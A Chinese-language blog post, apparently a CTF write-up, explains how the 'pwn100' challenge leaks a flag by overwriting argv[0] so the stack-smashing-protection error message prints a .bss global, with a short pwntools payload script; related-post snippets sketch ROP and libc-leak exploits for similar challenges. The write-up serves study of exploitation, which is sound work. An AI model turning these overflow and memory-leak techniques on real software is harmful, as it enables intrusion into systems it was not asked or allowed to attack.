pwn100 ssp

最新推荐文章于 2023-02-15 17:09:00 发布
最新推荐文章于 2023-02-15 17:09:00 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: CTF 文章标签: ssp pwn ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29947311/article/details/69739952
版权

ssp–利用栈溢出保护来泄露内存

这payload贼短。。

题目链接:ssp

Stack-smashing Protection (SSP,又名 ProPolice),是在函数的栈底插入一个随机数,这个随机数在函数调用结束后会被检测,如果与预设的不同,就会直接退出程序并打印如下的错误提示:

    *** stack smashing detected ***: ./pwn100 terminated
    Aborted (core dumped)

其中,./pwn100 是main函数的第一个参数,而这个值在这一题中是可以被覆盖的,而正好这题的flag是被读入了内存,存在一个全局变量里,所以我们可以把main函数的第一个参数覆盖为存有flag的全局变量在.bss段的地址,在打印错误信息时泄露出来:

    from pwn import *
    bss = 0x0600DC0
    io = process("./pwn100")

    payload = ""
    payload += p64(bss) * 0x40
    io.send(payload)

    io.interactive()

可以动态调试这个payload,跟进报错的函数 

___stack_chk_fail

来看参数如何传递并打印,据说CSAPP这本书的第8章有讲main函数参数在栈上的布局,我去看看,以后补发。

Vccxx
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn100
pppp974的博客
07-18 252
这是一道64位的题,用rop来最终解决 exp如下: #coding:utf-8 from pwn import * from LibcSearcher import * io=remote('111.198.29.45',5) readn = 0x40063D start = 0x40068E read_got = 0x601028 put_plt = 0x400500 put_got = ...
pwn-100(xctf)
weixin_43868725的博客
05-24 394
0x0 程序保护和流程 保护: 流程: main() sub_40068E() sub_40063D() 通过程序流程我们可以看出在sub_40068E()调用sub_40063D()时发生了栈溢出。 0x1 利用过程 1.这个程序没有system()函数,也没有"/bin/sh"。但是我们程序运行的时候需要libc。而libc中有我们需要的system(),所以我们只需要确定libc的基地址就可以知道system()。这里给出两种方法获取libc的基地址。第一种是pwntools自带的DynELF
pwnpwn-100
醉等佳人归
09-06 438
1.题目 1.1.保护机制 没开canary和ASLR,只开了NX 1.2.关键代码 2.思路 很明显就是一个简单栈溢出漏洞,但是发现没有提供lib文件,导致我们不能直接去泄漏puts加载地址然后计算偏移得到system的地址,pwn库提供了一个通过泄漏地址遍历lib库 d = DynELF(leak,elf=elf) system_addr = d.lookup('system','libc') leak参数是一个函数,函数参数为地址,地址由DynELF提供,函数功能就是通过参数地址泄漏出该地址指
攻防世界 pwn--pwn-100
YANG12345_6的博客
11-28 3295
一、checksec一下 开启了NX 二、 file一下,查看文件属性 64位文件 三、执行 让用户不断输入 四、拖进ida里分析看反汇编代码 主要代码: 数组v1的大小是0x40,后面利用的read函数的size是0xC8,有栈溢出漏洞 五、在ida里没有找到可以利用的system("bin/sh)和system("cat flag") 六、原程序中没有调用system函数,在GOT和PLT表中没有随system函数的记录,只能从libc中寻找system函数 有puts和read函数,可以利用
PWN篇:攻防世界PWN-100
weixin_44644249的博客
02-04 400
攻防世界进阶PWN-100 做这道题的时候远程环境可能有点问题,链接上收不到字符,在本地跑exp是可以拿到shell的。之前以为写错了,买了wp试也不行,重开环境还是不行,先记录一下,以后能连上了再提交flag。 查看保护 IDA分析 主函数 sub_40068e sub_40063d 思路分析 sub_40063d接收两个参数(IDA解析这里有点问题,可以查看汇编代码分析),a2=200,a1=&v1[64] 当 i 小于200,read输入到v1,这个就是溢出点,当 i >=
pwn100题目文件及exp.zip
08-09
本资源中的“pwn100”可能是一个初级级别的CTF(Capture The Flag)竞赛题目,旨在帮助学习者了解和实践栈溢出漏洞的利用技巧。 栈溢出是由于程序在分配的栈空间之外写入数据,导致栈上的其他变量或返回地址被覆盖...
2017湖湘杯pwn100的题目
11-30
2017湖湘杯pwn100的题目的二进制文件和libc的二进制文件
2024NKCTF-pwn
最新发布
03-25
2024NKCTF_pwn
welpwn pwn 入门题
02-11
pwn 入门题
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
ArcGis_JavaScript v4.8
08-14
包含最新版本的 ArcGis_JavaScript v4.8 SDK 和 API 工具包、源代码、全套资料参考,难得的宝贵资料,对开发很有帮助,保证下载不后悔。
pwn学习系列--任务3 pwn100
weixin_44113469的博客
01-31 610
pwn100解题步骤 1.先将pwn100 文件copy到虚拟机里,查看一波,文件是32位的 2.ida里f5 查看main函数 查看buf大小64+4,但read可向buf读入0x100,可看出这是个栈溢出 3.找了老久,我勒个去,没有system函数,身为小白的我,一直纠结这是要干啥,我该怎么办。。。但有getflag函数,额----,flag.txt自己弄,flag文件记得写点东西,不...
pwn100的解题过程
weixin_44007796的博客
01-31 916
pwn100的解题过程 一.先将pwn100这个文件放入到ida中,这是一个32位的文件,F5后点击main函数和getflag函数对pwn100进行分析。 首先,read函数是一个可以将0x100个字节传输到buf指针所指的内存中(0x100u是一个16进制的数,即256,u表示无符号),read函数很容易出问题,点进buf看一看,发现它的内存小于256,大约只有64+4=68。 由于ida...
pwn-100(L-CTF-2016)的个人想法(含DynELF的使用)
fzucaicai的博客
02-15 296
DynELF是一个用于动态获取库函数地址的类,可以在程序运行时获取库函数的地址,而不需要提前知道库函数的地址。在这段代码中,是创建一个DynELFleak是一个用于泄漏内存地址中的内容的函数;elf=elf是pwn100程序的ELF对象,用于获取程序中的一些基本信息(如函数地址、数据段地址、代码段地址等)。DynELF类会根据提供的泄漏函数leak中泄漏出来的puts函数地址和程序中的ELF信息,动态计算出libc库的基地址,然后可以使用d.lookup方法根据libc库中的函数名获取该函数的地址。
2017年湖湘杯复赛 pwn100-writeup
aptx4869_li的博客
12-22 1136
2017年湖湘杯复赛 pwn100-writeup 这是本人第一次做出来pwn的题可能有些地方显得比较笨,但尽量把自己所想的每一步都描述清楚。不足之处请批评指正。
PWN:Canary学习2
weixin_44319142的博客
04-05 439
PWN:Stein:Gate 套路操作 开了canary,是64位的RELRO开是开了不过这题目里面没影响,据说是got表不能再更改了,不清楚会咋样,下次碰到题目再说 ida看看 进sub_400AF1看到,他的unk_602040在bss上,正好,里面有system函数,把/bin/sh写到bss里面,然后调用system 看到rdi了,那个就是用来给system传参数 pop_rdi=...
pwn的一些技巧与总结
weixin_30477797的博客
09-27 857
原文地址:https://github.com/Naetw/CTF-pwn-tips 目录 溢出 在gdb中寻找字符串 二进制服务 找到libc中特定函数的偏移地址 Find '/bin/sh' or 'sh' in library Leak stack address gdb中的fork问题 Secret of a mysterious section - .tls Predictable R...
【SCTF&&CCTF 2016】 PWN_WRITEUP
wintersun的地带
05-15 3689
这里是摘要吗
canary的训练 pwn 的一种保护姿势(持续更新中)
qq_41071646的博客
04-18 594
https://xz.aliyun.com/t/4657#toc-0 题目来自上面这个链接 多谢大佬的 分享 偶然看到这个链接 然后 其实我自己做过类似的题目 但是 那个时候不懂保护姿势是什么 所以现在开始练习一下 因为一开始比较喜欢图形页面 所以一般都用ida 来调试 但是 后来 调试堆的时候 发现了 pwngdb 还有gef 等 gdb插件的好用 所以我就直接 开始用gdb...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值